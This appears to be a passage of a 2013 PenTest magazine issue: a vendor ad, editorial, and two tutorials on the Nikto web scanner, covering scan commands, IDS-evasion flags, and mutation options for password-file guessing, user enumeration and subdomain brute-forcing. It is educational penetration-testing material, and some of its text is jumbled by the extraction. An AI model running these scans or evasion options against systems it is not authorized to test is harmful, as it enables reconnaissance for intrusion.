KEY FEATURES
CYBER SECURITY AUDITING SOFTWARE
Configuration Auditing with no Network Traffic
Nipper Studio is your cyber security expert in a box. Our industry leading security auditing tool allows you to produce detailed and thorough security audits of your network devices in seconds, at a fraction of the cost of manual testing.
Advanced, Detailed Reporting CVSSv2 Rating Systems Customizable Settings Easy to Action Mitigation Reports Multi-Platform Support Secure Offline Activation
Companies worldwide depend on their computer systems to successfully run their businesses. These systems will often contain classified information, therefore it is imperative that they are secure. However due to time and cost restrictions manual penetration tests may happen only once or twice a year. Nipper Studio not only dramatically reduces the time taken for penetration testing but also helps you to feel secure in the intervals between manual audits. With Nipper Studio you can audit the same set of devices as many times as you like during your subscription period, so you can feel secure and stay secure.
PLUS much more...
With years of experience in the network auditing industry we understand it is important that a security audit highlights all potential threats and doesn’t just review firewall rules. As a result Nipper Studio’s advanced and detailed reporting is used and trusted by global organisations in the financial, telecommunications, defence, government and security sectors and has users in 40 countries worldwide.
NEW FEATURES!
Save Time
Raw Configuration Change Tracking: Nipper Studio reports now include the raw configuration changes from your network device. Nipper Studio highlights the different options within your configuration that have been added or removed since the previous audit.
Security audits are time consuming for both the systems owner and the auditors. A detailed examination of an average sized configuration can take half a day and 2 to 3 weeks to complete the report. Nipper Studio can perform the audit and produce the final report in just a few seconds.
PLUS!..
Save Money
Audit Change Tracking: Now you can include a change comparison within your security audit. The report then highlights the vulnerabilities fixed, the issues still remaining and any new vulnerability that has occurred since your last audit. This allows you to have a clear view of how your system’s security has progressed.
Audit companies typically charge per man day for auditing and reporting. For a 25 device network an audit and report could take up to 3 weeks. An experienced security auditor would typically cost £1,000 per day, so an audit of a small network could cost up to £20,000. A Nipper Studio license for 25 devices costs only £600!
Over 100 Plugins Technical Support and Updates
Multi-Platform Support for...
Windows
Linux
Nipper Studio Supported Devices
Mac
PLUS more...
Titania Limited • County House • St Mary’s Street • Worcester WR1 1HB • UK Telephone: +44 (0)845 652 0621 • Email: enquiries@titania.com • www.titania.com Titania Limited is a company registered in England and Wales. Registered Number: 6870498. VAT Registration Number: 984 3990 61
Dear PenTesters!
Managing Editor: Krzysztof Wiśniewski krzysztof.wisniewski@software.com.pl Betatesters: Jay Trinckes, Jeff Weaver Proofreaders: Mark Barton, Tony Campbell, Kevin Fuller, Stefanus Natahusada, Cathryn Olds, Dyana Pearson, Emiliano Piscitelli Adrian Rodriguez, Johan Snyman, Jeff Weaver, Ed Werzyn Senior Consultant/Publisher: Paweł Marciniak CEO: Ewa Dudzic ewa.dudzic@software.com.pl Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl DTP: Ireneusz Pogroszewski Production Director: Andrzej Kuca andrzej.kuca@software.com.pl Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 www.pentestmag.com Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used
program
by Mathematical formulas created by Design Science MathType™
DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
Since we believe that knowledge should be widely and freely available for everyone, we have decided to contribute to the information security community by releasing a new line of PenTest Magazine. What you are looking at is a very first issue of PenTest Open, our new monthly title, free to download for all of our readers – both free members and subscribers. Every issue of PenTest open would contain extract from last issues of our regular titles: PenTest Regular, Auditing & Standards PenTest, PenTest Extra and Web App PenTesting, selected by our experts, giving you opportunity to familiarize yourself with the best articles from every month and allowing you to learn about new methodologies, techniques and tools used by infosec professionals. So let’s have a look at what we’ve prepared for you this time. From our main magazine, PenTest Regular, we chose two articles concerning Nikto. In the first one, Eduard Kovacs presents Nikto as a two-edged sword: a useful tool but also a dangerous instrument used by criminals. As he claims, cyber security is a very important issue in modern society. In another article, with a little help from Ankhorus, we can learn how to launch mutation techniques with Nikto.. In ISO 27001 section from Auditing & Standards PenTest Paulo Coelho introduces us to four popular misconceptions about this standard. After quick introduction, we learn once more, that well-known truths are not always trustworthy. As we go further with reading, we can find an article by Alan Cook, where he proves, that sometimes technology is the answer to our security problems which is of course based on great example of ISO 27001. From Web App PenTest we give you the most developed section of this issue, about Burp Suite. Kilian Faughnan gives us quick introduction to processes used to identify Vulnerabilities, both automated and manual. His article goes through some of the commonly used components of the PortSwigger Burp Suite, looking at the automated and manual processes that can be used to identify vulnerabilities in web applications, and how to leverage both methods in order to get the most out of the Burp Suite. Then Gerasimos Kassaras presents tutorial how to exploit an External Entity Injection vulnerability using Burp Suite. We also find out what the Burp Suite really is, and in how many areas we could use it. Finally Omar Al Ibrahim shares his experiences in web penetration testing using this tool. He describes Burp Proxy, the main tool of Burp Suite, and its latest extensions, providing some useful tools and features for web penetration testing. At the end of this issue, we give you complex article about SSH Tunnels from our latest magazine. Andrea Zwirner teaches you how to use SSH Tunnels in different ways, for example to bypass network and web application firewalls, or to bypass proxies and content inspection devices and many others useful information. We hope, that you’ll find the new line of PenTest Magazine useful and compelling. Thank you all for your great support and invaluable help. Enjoy reading! Krzysztof Wiśniewski & PenTest Team
OPEN 01/2013
Page
4
http://pentestmag.com
CONTENTS
NIKTO
06
there is no substitution for doing it yourself. This article
Nikto: A Powerful Web Scanner Used by Researchers and Cybercriminals Alike
will go through some of the more commonly used components of the PortSwigger Burp Suite, looking at the automated and manual processes that can be used to identify
by Eduard Kovacs
Cyber security has become a highly important issue in the past period. Both individuals and companies have started realizing that computers and the Internet in general are not only a way to have fun or perform various work tasks in an efficient manner, but also a “tool” for criminals to commit crimes with.
12
Nikto: How to Launch Mutation Techniques by Ankhorus
Nikto is an open source web server assessment tool. It is designed to find various default and insecure or dangerous files/CGI, configurations and programs on any type of web server. It scans a web server for software misconfigurations, insecure files, outdated servers and programs to find security vulnerabilities.
both methods in order to get the most out of the Burp Suite.
42
How To Infiltrate Corporate Networks Using XML External Entity Injection by Gerasimos Kassaras
This tutorial is going to explain how to exploit an External Entity Injection (XXE) vulnerability using Burp suite and make the most out of it. Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
Web Application Penetration Testing
46 Using Burp Suite
ISO 27001
22
vulnerabilities in web applications, and how to leverage
Four Misconceptions Abouut ISO/IEC 27001
by Omar Al Ibrahim
Burp Suite is an integrated platform with a number of
by Paulo Coelho
Article tries to deconstruct some of the misconceptions about ISO/IEC 27001. This security management standard is said to require the introduction of control activities into the normal business and IT operations, which consequently increases the workload and causes operational inefficiencies.
tools and interfaces to enumerate, analyze, scan, and exploit web applications. Its main tool, Burp Proxy, is used to intercept HTTP request/responses, but it has recently been extended to provide a suite of other useful tools for web penetration testing. In this article, I will introduce some of the features of Burp Suite and share my experiences in web penetration testing using these tools.
SSH TUNNELS
Testing Your Most Valuable Assets
26 by Alan Cook
SSH Tunnels: How to Attack Their
When thinking about Information Security, we can sometimes be forgiven for thinking that technology is the an-
56 Security
by Andrea Zwirner
swer to all our security problems.
You will learn how to use SSH tunnels to bypass network
BURP SUITE
capsulate SSH tunnels to bypass proxies and content in
32
and web application firewalls, antiviruses; how to en-
Burp Suite – Automated and Manual Processes Used to Identify Vulnerabilities by Killian Faughnan
As most penetration testers know, there is no amount of
spection devices; how privilege separation programming pattern enforces local processes security; how to trace SSH daemon activities in order to steal login passwords and sniff SSH tunneled communications catching interprocess communications.
automated tools that could replace a real life pen-tester. Sure, in our testing we use automated tools to assist and speed up the process, but when you really get down to it
OPEN 01/2013
Page
5
http://pentestmag.com
NIKTO
Nikto: A Powerful Web Scanner Used by Researchers and Cybercriminals Alike This article is devoted to the webserver scanner tool Nikto. First I will describe the tool itself, its features and flavors. Then I will show the reader a fast way to setup, scan a host and create a report.
T
hat’s why, in the past period, internauts have become aware of the fact that they can’t trust emails which inform them that they’ve won a lottery, or social network posts in which they’re told to click on a link to see an outrageous video. At the same time, organizations are starting to learn that they must properly test their web servers and their websites to make sure that they’re not plagued by security holes which could be exploited by a malicious actor. This is where Nikto steps in. Penetration testers and IT departments can utilize the powerful web server scanner to identify the issues that expose networks and digital assets to cybercriminals and their campaigns.
Introduction
Nikto is a Perl-based open source web server/website scanner, developed back in 2001 by Chris Sullo – the co-founder of the Open Security Foundation .. The latest version of the tool is capable of performing tests against over 6,500 potentially dangerous files and CGIs. It’s also designed to check for version-specific problems on more than 270 servers and, since keeping a machine up to date is so important these days, Nikto can also tell you if the server variants are outdated. One noteworthy thing here is that OPEN 01/2013
the pentesting tool can check for the outdated versions of 1,250 servers. Potentially dangerous files, Directory Traversal, outdated software, cross-site scripting (XSS), SQL Injection, misconfigured applications, and Remote File Inclusion are just some of the issues that can be easily identified by Nikto. In April 2012, security firm Imperva released a study to highlight the fact that in a large majority of the cyberattacks they launched, the attackers relied on automated tools. This tactic allows even more unskilled cybercriminals to launch devastating attacks. According to Imperva’s report, 98% of Remote File Inclusion (RTF) attacks and 88% of SQL Injection attacks are in fact automated. The report reveals that one of the tools often utilized in automated attacks against websites and web servers is Nikto. To sum it up, the attacks in which Nikto is leveraged have a typical user agent, they don’t have “Accept” headers, show high frequency of requests, and have a typical URL used for Remote File Inclusion. The fact that it relies on a typical user agent makes Nikto less stealthy, but that’s because it’s not designed to be so. The developers clearly state that the scanner is not an “overly stealthy tool.” Instead, it’s designed to be
fast and efficient.
Page 6
http://pentestmag.com
On the other hand, one of the reasons for which cybercriminals prefer it might be the fact that – as Imperva highlights – there’s nothing to suggest the source of the attack has a malicious reputation. I’ve mentioned this particular Imperva study and the fact that it’s utilized in cyberattacks not because I want to encourage the use of Nikto for malicious purposes, but to underscore the fact that it’s a very powerful tool. It’s well known that cybercriminals tend to use the best resources available and the fact that Nikto is one of them says a lot about the scanner’s potential.
Nikto
Nikto requires a Perl interpreter to run, but that shouldn’t be an issue for Linux users since many distributions come with such a component by default. Furthermore, I’ve seen some Linux variants that come with Nikto installed by default. Windows customers are recommended to install Nikto in a virtual machine running Ubuntu or other similar operating system. For those who aren’t too keen on running Nikto from inside a virtual machine running Linux, here’s what you need. First of all, you must install Perl. Any version that works on Windows will do, but I would recommend something like ActivePerl by ActiveState. Once Perl is installed, you’ll need to download an archive utility that can extract files from .tar files, Microsoft Visual C++ 2008 Redistributable, and NMake – a clever tool that builds projects based on commands from a description file. They are both available on Microsoft’s website. You also need a C compiler, OpenSSL and the Perl SSL module Net_SSLeay.pm available on CPAN.org. Apple Mac OS customers, on the other hand, can utilize one of the versions specially made for their systems. For instance, there’s Yang (Yet Another Nikto GUI) which is available for free on the App Store. Apple customers can also turn to MacNikto, an AppleScript GUI shell script wrapper built in Xcode and Interface Builder. MacNikto is designed to place Nikto’s powerful scanning and reporting engine behind an easy-to-use interface. One noteworthy thing is that Nikto itself isn’t incorporated into MacNikto. Users must make sure that Nikto is present on the computer before running MacNikto. OPEN 01/2013
Considering that these variants of Nikto come with a window-based user interface, they’re somewhat more attractive and easier to utilize.
Running Nikto
If you have Linux, all you have to do is unzip the .tar file that contains Nikto, open a command terminal and navigate to the application’s directory by using the cd command. Once you’re in the Nikto directory, considering that you have a Perl interpreter installed, you can run it by using the following command: perl nikto.pl [parameter(s)]. One noteworthy aspect is that if you want to test SSL servers, you need to install the Net::SSLeay Perl module that is available at the CPAN repository.
Basic Commands
Nikto has come a long way since the first version, many of the improvements being done based on tickets submitted by those who utilized the tool. New plugins and features are added with almost each release and all you have to do to update your installation to the latest version is use the –update command. If you’re not familiar with Nikto and you don’t know any of the parameters, all you need to do is type perl nikto.pl and you will be presented with all the available commands. By running the program with the –Help command, users can learn what each command line option is good for in detail (Figure 1). As a general rule, most of the commands have shortcuts. For example –port can also be written as –p. –host can be used as –h, and so on. The -ask command is used for the update process. If the command is followed by Yes, Nikto asks customers before submitting an update, this
Figure 1. Using the –Help command to see a detailed list of Nikto options
Page 7
http://pentestmag.com
NIKTO being the default setting. Other parameters are No and Auto. When scanning CGI directories, users must specify the –Cgidirs, followed by special words such as none or all, depending on what locations they want to test. There’s also a way to only discover the HTTP or HTTPS ports and report the server’s header, without performing an actual scan. This can be achieved by utilizing the –findonly command. In case you need to authenticate yourself before testing a target host, the –id command followed by username:password is very useful. Another interesting, but also highly important, command is –Display. It can help customers control the output. For example, if you want to see the redirects that take place, you can use the –Display 1. 2 and 3 are arguments that can be used to show received cookies, respectively 200/OK responses. D is for debug output, E to show all HTTP errors, P to print progress to STDOUT and V is for verbose output (Figure 2). Other noteworthy command line options are –IgnoreCode, -maxtime, -nocache, -nolookup, -nointeractive, -nossl, -no404, -pause, -until, -version, and -vhost. Finally, the most important command is –host, which lets users specify which host they want to test.
Basic tests
The most basic test can be performed with the following command (the IP address must be replaced with the one of the targeted host): perl nikto.pl
–h 192.168.0.1.
If you don’t know the IP address of your target, you can simply replace the IP with the URL: perl
nikto.pl
–h
http://targetwebsite.com
(Figure 3). If you’re interested in scanning a specific port, you can add the –p parameter followed by the port number. In case no port is specified, Nikto will automatically scan port 80, which is the most common. It doesn’t matter if the tested host is an SSL server, since the application will test HTTPS implicitly if the HTTP test fails, but if you want to speed up the process, you can add the –ssl parameter. So, to test your SSL host’s 443 port as quickly as possible, all you have to do is write: perl nikto.pl -h targetwebsite.com -p 443 –ssl. You are not limited to testing only one port. You can test as many as you want by specifying their number or range: perl nikto.pl -h testwebsite. com -p 80-90,433 –ssl. With Nikto, you don’t have to limit your tests to only one host. You can scan multiple hosts in one session by placing the host names or IP addresses in a file, with each target written on a separate line. Then, when you start the process, instead of writing the IP or the host name after the –h parameter, you write the name of the file. Another advantage of this particular application is that it can be utilized to check hosts that can be accessed only through a HTTP proxy. This can be done by using the –useproxy command followed
Figure 2. Utilizing the –Display E command to display all HTTP errors
Figure 4. The current scan status displayed by pressing the space bar
Figure 3. Basic test performed in Nikto OPEN 01/2013
Figure 5. Utilizing the -mutate command to test all files with all root directories Page 8
http://pentestmag.com
by the proxy’s details. For instance: perl nikto.
pl –h localhost –useproxy http://localhost: 8080/.
One good thing about Nikto is that in some cases it provides the user with a link that points to additional resources related to the identified vulnerabilities (see Figure 7 and Figure 8).
Interactive options and output formats
Users who run Nikto on a system that provides POSIX support can change several options even during the time a scan is taking place. For instance, if you press the space bar on your keyboard during the scan, you will see a report on the current scan status (Figure 4). The v key can be used to toggle verbose mode, e to toggle error reporting, p for process reporting, d to turn the debug mode on or off, c for cookie display, r to turn the redirect display on or off, and q to quit. The scan can be paused by pressing p or the next host can be selected by pressing the n key. The results of your work can be saved in a number of formats, including HTML, CVS, text and
Figure 6. Utilizing the –Tuning (-T) command to scan for specific vulnerabilities
XML. The best part is that the final report can even be exported to Metasploit. The output file’s format can be selected by using the –format parameter after –output.
Fine tuning and mutating scans
For more customized tests, there are two very important commands: -mutate and –Tuning. The –mutate command must be followed by arguments such as 1, 2, 3, 4, 5 and 6, each of them being designed for a specific mutation technique. 1 tests all files with all root directories, 2 is utilized for guessing password file names, and 3 and 4 for enumerating user names via Apache, respectively via cgiwrap. Assuming that the host name is the parent domain, sub-domain names can be forced by using –mutate 5. Directory names from a supplied dictionary file can be guessed with –mutate 6. Extra information on mutations can be obtained with – mutate-options (Figure 5). By default, Nikto performs all tests against the selected target, but there may be situations in which a pentester wants to scan only for specific issues. That’s where the –Tuning (-T) option steps in. The command arguments are the following: 0 – File Upload; 1 – Interesting File / Seen in logs; 2 – Misconfiguration / Default File; 3 – Information Disclosure; 4 – Injection (XSS/Script/HTML); 5 – Remote File Retrieval – Inside Web Root; 6 – Denial of Service; 7 – Remote File Retrieval – Server Wide; 8 – Command Execution / Remote Shell; 9 – SQL Injection; a – Authentication Bypass; b – Software Identification; c – Remote Source Inclusion If you want to test a server for Denial of Service, SQL Injection and XSS Injection, you use: perl nikto.pl –h http://targetwebsite.com –T 469. On the other hand, if you want to test for all of these vulnerabilities except Command Execution (8), you don’t have to write –T 12345679. Instead, you use the x argument to negate tests. The command line would be: perl nikto. pl
–h
(Figure 6).
http://targetwebsite.com
–T
Evasion
Figure 7. Utilizing the –e command to use the directory selfreference evasion technique OPEN 01/2013
x8
The intrusion detection system evasion techniques are also very important. The evasion techniques include random URI encoding (1), directory self-reference (2), premature URL ending (3), prepend long random string (4), the use of fake parameters (5), TAB as request spacer (6), changing the case of the URL (7), the
Page 9
http://pentestmag.com
NIKTO use of Windows directory separators (8), and the use of carriage return (0X0d) (A) and binary value 0X0b as request spacers (B) (Figure 7 and Figure 8). Although high-performance intrusion detection systems are likely to catch these evasion techniques, they still could be highly useful. The evasion techniques can be utilized during a scan by specifying the technique’s associated number/letter after the –evasion or –e command. For instance, to utilize directory self-reference, you have to write: perl nikto.pl –h http://192.168.1.2 –e 2. The use of multiple evasion techniques in the same scan is possible simply by writing the associated argument of all the techniques you wish to utilize: perl nikto.pl –h http://192.168.1.2 –e 246A.
Plugins
Since plugins sit at the base of Nikto, they’re highly important. Users can develop their own plugins or utilize existing ones depending on their needs. For listing existing plugins there is –list-plugin and
Figure 8. Utilizing the –e command to use the random URI encoding evasion technique
Figure 9. Utilizing the –list-plugin command to display all available plugins OPEN 01/2013
for actually using them, you must use the –plugin command, followed by the name of the plugin (Figure 9). Of course, you’re not limited to utilizing only one plugin. You can use all the ones available with – plugin @@ALL, you can use none of them with – plugin @@NONE, or you can use the default ones with @@DEFAULT (Figure 10). The implicitly installed plugins are nikto_core,
nikto_realms, nikto_headers, nikto_robots, nikto_httpoptions, nikto_outdated, nikto_ msgs, nikto_apacheusers, nikto_mutate, nikto_ passfiles, nikto_user_enum_apache and nikto_ user_enum_cgiwrap. Each of these elements has a
special purpose. For example, nikto_realms is an interesting one because it checks if the server uses HTTP basic authentication. If the target is protected by a username and a password, default credentials are loaded in an attempt to log in. Another noteworthy plugin is nikto_outdated, which checks for outdated server versions by comparing the target’s version against a list of up-todate servers found in the outdated.db file. Why is this important? Because in many of the cyberattacks launched these days, the first thing the attacker looks for is an outdated server variant that has known and easy-to-exploit vulnerabilities. Security experts always say that up-to-date components represent one of the most important factors when protecting a network against malicious campaigns. If the existing plugins don’t satisfy the pentester’s needs, additional ones can be created in Perl. However, the developer must be careful not to use variable and routine names that could come in conflict with the ones already utilized by Nikto. The run_plugin() function will correctly execute a plugin if the naming convention is respected (the file must be named nikto_pluginname.plugin) and the initialization routine is named the same as the plugin. Finally, in order for it to work, the plugin must be added to the nikto_plugin_order.txt file.
Figure 10. Utilizing the –plugin @@DEFAULT command to use the default plugins during scan Page 10
http://pentestmag.com
Integration and logging
References
Nessus users can also call Nikto. The results of the scan performed by Nikto can be incorporated into Nessus’ output with the use of the nikto.nasl plugin. For those who don’t know, Nessus is another comprehensive vulnerability scanning program that’s available for free to those who want to use it for non-commercial purposes. I don’t know where it stands now, but a few years ago it was called the world’s most popular vulnerability scanner. Support for logging to Metasploit is also available, but in order for it to function, customers need to install these modules: RPC::XML and RPC::XML::Client.
• http://www.madirish.net/185 • http://www.howtoforge.com/apache_security_testing_with_nikto • http://va-holladays.no-ip.info:2200/tools/securitydocs/nikto-v1.0.pdf • http://cirt.net • http://blog.tenablesecurity.com/2008/09/using-nessus-to.html • http://commons.oreilly.com/wiki/index.php/Network_Security_Tools/Modifying_and_Hacking_Security_Tools/Writing_Plug-ins_for_the_Nikto_Vulnerability_Scanner • http://news.softpedia.com/news/Imperva-HackersUse-Automated-Tools-in-Most-Attacks-266302.shtml • http://linux.softpedia.com/get/System/Networking/ Nikto-10271.shtml Web Security Testing Cookbook By Paco Hope, Ben Walther
Known issues and limitations
One issue with Nikto is that it can produce a lot of false positives and it can bring up a lot of unimportant issues, so the results must be doublechecked by the penetration tester. The tester must manually go through a number of potential false positives in order to identify the real issues. As Paco Hope and Ben Walther highlight in their book called “Web Security Testing Cookbook,” Nikto can detect the presence of problems, but it cannot prove the absence of problems. If Nikto doesn’t find any vulnerabilities, it doesn’t necessarily mean that there aren’t any. Professional penetration testers who have been using Nikto for a long period will probably find its results less valuable after some time. More importantly, experts recommend against using it as a quality metric or as a gate in the software development process. Instead, it’s best suited for scanning websites after major changes have been applied to it.
So, whether you are a penetration tester, a web developer, or a member of your company’s IT department, Nikto is certainly a web scanner that’s worth looking into, not only because it’s free, but also because it checks some things you probably wouldn’t think about trying. You might be presented with false positives, but there probably isn’t such a thing as a perfect web scanner.
Conclusion
Nikto is not a foolproof tool, but it has certainly come a long way since it was launched. Furthermore, judging by the fact that its developers are constantly working on improving it, the scanner will probably become an even more valuable resource for penetration testers. Although it doesn’t have a fancy user interface with colorful buttons and graphical elements for reporting, Nikto is not that difficult to utilize, even if you’re just at the beginning of your journey as a security researcher. On the other hand, it does force you to verify each of the results to make sure that it really exists. OPEN 01/2013
Eduard Kovacs
Eduard Kovacs is a security news editor at Softpedia – the free downloads encyclopedia. He covers topics such as privacy, data breaches, information security research, and online safety. You can find him on Twitter (@ EduardKovacs), Google Plus (@Kovacs Eduard) and at news.softpedia.com/cat/Security/
Page 11
http://pentestmag.com
NIKTO
Nikto: How to Launch Mutation Techniques This article is devoted to the webserver scanner tool Nikto. First I will describe the tool itself, its features and flavors. Then I will show the reader a fast way to setup, scan a host and create a report.
N
ikto is an open source web server assessment tool. It is designed to find various default and insecure or dangerous files/CGI, configurations and programs on any type of web server (Figure 1). It scans a web server to find potential problems and security vulnerabilities, including: • • • •
Server and software misconfigurations Default files and programs Insecure files and programs Outdated servers and programs
addition, error responses for various file extensions can differ--the “not found” response for a .html file is often different than a .cgi. As of version 2.0 Nikto no longer assumes the error pages for different file types will be the same. A list of unique file extensions is generated at run-time, and each of those extensions is tested against the target. For every file type, the “best
Nikto is built on LibWhisker2 and can run on any platform which has a Perl environment. It supports SSL, proxies, host authentication, attack encoding and more. It can be updated automatically from the command-line, and supports the optional submission of updated version data back to the maintainers.
Logic of Advance Error Detection
Most web security tools rely heavily on the HTTP response to determine if a page or script exists on the target. Because many servers do not properly adhere to RFC standards and return a 200 “OK” response for requests which are not found or forbidden, this can lead to many false-positives. In OPEN 01/2013
Figure 1. Nikto in Backtrack
Page 12
http://pentestmag.com
method” of determining errors is found: standard RFC response, content match or MD4 hash. This allows Nikto to use the fastest and most accurate method for each individual file type, and therefore help eliminate the false positives seen for some servers in version 1.32 and below. For example, if a server responds with a 404 “not found” error for a non-existent .txt file, Nikto will match the HTTP response of “404” on tests. If the server responds with a 200 “OK” response, it will try to match on the content, and assuming it finds a match (for example, the words “could not be found”), it will use this method for determining missing .txt files. If the other methods fail, Nikto will attempt to remove date and time strings from the returned page’s content, generate an MD5 hash of the content, and then match that hash value against future .txt tests. The latter is by far the slowest type of match, but in many cases will provide valid results for a particular file type. This feature is performed by making several requests for non-existent pages of various file types. This may add up to a thousand requests to the remote server during the lifetime of the scan. This may not be desirable over slow connection and can be disabled with the -no404 option Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible,
and is fairly obvious in log files. However, there is support for LibWhisker’s anti-IDS.
Requirements to run Nikto
Any system which supports a basic Perl installation should allow Nikto to run. It has been tested on: • Windows (using ActiveState Perl and Strawberry Perl). Some POSIX features, such as interactive commands may not work under Windows. • Mac OSX • Various Linux and Unix installations (including RedHat, Solaris, Debian, Ubuntu, Backtrack, etc.) The only required Perl module that does not come standard is LibWhisker. Nikto comes with and is configured to use a local LW.pm. As of Nikto version 2.1.5, the included LibWhisker differs (slightly) from the standard LibWhisker 2.5 distribution.
Installation
Nikto came pre- installed on the Backtrack OS versions no need to install it. On other OS you need to download the Nikto package. Unpack the download file:
Figure 2. Nikto location in backtrack OPEN 01/2013
Page 13
http://pentestmag.com
NIKTO tar -xvfz nikto-current.tar.gz
Assuming a standard OS/Perl installation, Nikto should now be usable (Figure 2).
Basic Testing
The most basic Nikto scan requires simply a host to target, since port 80 is assumed if none is specified. The host can either be an IP or a hostname of a machine, and is specified using the -h (-host) option. This will scan the IP 192.168.1.5 on TCP port 80: To check on a different port, specify the port number with the -p (-port) option. This will scan the IP 192.168.1.5 on TCP port 443: Hosts, ports and protocols may also be specified by using a full URL syntax, and it will be scanned: There is no need to specify that port 443 may be SSL, as Nikto will first test regular HTTP and if that fails, HTTPS. If you are sure it is an SSL server, specifying -s (-ssl) will speed up the test.
http://192.168.1.5:8080/ 192.168.1.7
A host file may also be an nmap output in “greppable” format (i.e. from the output from -oG). A file may be passed to Nikto through stdout/ stdin using a “-” as the filename. For example: nmap -p80 192.168.0.0/24 -oG – | nikto.pl -h -
Using a Proxy
If the machine running Nikto only has access to the target host (or update server) via an HTTP proxy, the test can still be performed. There are two ways to use a proxy with Nikto, via the nikto.conf file or directly on the command line (Figure 3). To use the nikto.conf file, set the PROXY* variables, and then execute Nikto with the -useproxy option. All connections will be relayed through the HTTP proxy specified in the configuration file. To set the proxy on the command line, use the -useproxy option with the proxy set as the argument, for example:
Updating
Multiple Port Testing
Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). This will scan the host on ports 80, 88 and 443.
Nikto can be automatically updated, assuming you have Internet connectivity from the host Nikto is installed on. To update to the latest plugins and databases, simply run Nikto with the -update command (Figure 4).
Multiple Host Testing
Figure 3. Proxy settings in .conf file
Valid Hosts File 192.168.1.5:80
Figure 4. Updating process- Nikto
Nikto support scanning multiple hosts in the same session via a text file of host names or IPs. Instead of giving a host name or IP for the -h (-host) option, a file name can be given. A file of hosts must be formatted as one host per line, with the port number(s) at the end of each line. Ports can be separated from the host and other ports via a colon or a comma. If no port is specified, port 80 is assumed. This is an example of a valid hosts file:
OPEN 01/2013
Page 14
http://pentestmag.com
Updates may also be manually downloaded from the appropriate version’s directory at http://cirt.net/ nikto/UPDATES/. Plugin and database files from the server should replace those in the ‘plugins’ or ‘databases’ directories.
Interactive Features
Nikto contains several options which can be changed during an active scan, provided it is running on a system which provides POSIX support, which includes *nix and some other operating systems. On systems without POSIX support, these features will be silently disabled. During an active scan, pressing any of the keys below will turn on or off the listed feature or perform the listed action. Note that these are case sensitive. • • • • • • • • • • • •
-dbcheck
Check the scan databases for syntax errors.
-Display
Control the output that Nikto shows. Use the reference number or letter to specify the type. Multiple may be used: 1 – Show redirects 2 – Show cookies received 3 – Show all 200/OK responses 4 – Show URLs which require authentication D – Debug Output E – Display all HTTP errors P – Print progress to STDOUT V – Verbose Output
-evasion
Specify the LibWhisker encoding/evasion technique to use (see the LibWhisker docs for detailed information on these). Note that these are not likely to actually bypass a modern IDS system, but may be useful for other purposes. Use the reference number to specify the type, multiple may be used:
SPACE – Report current scan status v – Turn verbose mode on/off d – Turn debug mode on/off e – Turn error reporting on/off p – Turn progress reporting on/off r – Turn redirect display on/off c – Turn cookie display on/off o – Turn OK display on/off a – Turn auth display on/off q – Quit N – Next host P – Pause
All Options
Below are all of the Nikto command line options and explanations. A brief version of this text is available by running Nikto with the -h (-help) option (Figure 5).
-ask
1 – Random URI encoding (non-UTF8) 2 – Directory self-reference (/./) 3 – Premature URL ending 4 – Prepend long random string 5 – Fake parameter 6 – TAB as request spacer 7 – Change the case of the URL 8 – Use Windows directory separator (\) A – Use a carriage return (0x0d) as a request spacer B – Use binary value 0x0b as a request spacer
Whether to ask about submitting updates: yes (ask about each – the default), no (don’t ask, just send), auto (don’t ask, just send).
-Cgidirs
Scan these CGI directories. Special words “none” or “all” may be used to scan all CGI directories or none, (respectively). A literal value for a CGI directory such as “/cgi-test/” may be specified (must include trailing slash). If this is option is not specified, all CGI directories listed in nikto.conf will be tested.
-config
Specify an alternative config file to use instead of the nikto.conf file located in the install directory. OPEN 01/2013
Figure 5. Nikto options
Page 15
http://pentestmag.com
NIKTO -findonly
Only discover the HTTP(S) ports, do not perform a security scan. This will attempt to connect with HTTP or HTTPS, and report the Server header. Note that as of version 2.1.4, -findonly has been deprecated and simply sets ‘-Plugins “@@NONE”’ which will override any command line or config file settings for -Plugins.
-Format
Save the output file specified with -o (-output) option in this format. If not specified, the default will be taken from the file extension specified in the -output option. Valid formats are: csv – a comma-separated list htm – an HTML report msf – log to Metasploit txt – a text report xml – an XML report Host(s) to target. Can be an IP address, hostname or text file of hosts. A single dash (-) may be used for stdin. Can also parse nmap -oG style output.
1 – Test all files with all root directories 2 – Guess for password file names 3 – Enumerate user names via Apache (/~user type requests) 4 – Enumerate user names via cgiwrap (/cgi-bin/ cgiwrap/~user type requests) 5 – Attempt to brute force sub-domain names, assume that the host name is the parent domain 6 – Attempt to guess directory names from the supplied dictionary file Provide extra information for mutates, e.g. a dictionary file.
-nolookup
Do not perform name lookups on IP addresses.
-nocache
Disable response cache.
-Help Display extended help information.
-id
ID and password to use for host Basic host authentication. Format is id:password.
-IgnoreCode
Ignore these HTTP codes as negative responses (always). Format is “302,301”.
-list-plugins
Will list all plugins that Nikto can run against targets and then will exit without performing a scan. These can be tuned for a session using the -Plugins option. The output format is: Plugin name full name – description Written by author, Copyright (C) copyright
Maximum execution time per host, in seconds. Accepts minutes and hours such that all of these are one hour: 3600s, 60m, 1h. OPEN 01/2013
Specify mutation technique. A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be used:
-mutate-options
-host
-maxtime
-mutate
-nointeractive Disable interactive features.
-nossl
Do not use SSL to connect to the server.
-no404
Disable 404 (file not found) checking. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device. This will generally lead to more false positives being discovered.
-output
Write output to the file specified. The format used will be taken from the file extension. This can be over-riden by using the -Format option (e.g. to write text files with a different extenstion. Existing files will have new information appended. A single dot (.) may be specified for the output file name, in which case the file name will be automatically generated based on the target being tested. Note that the -Format option is required when
Page 16
http://pentestmag.com
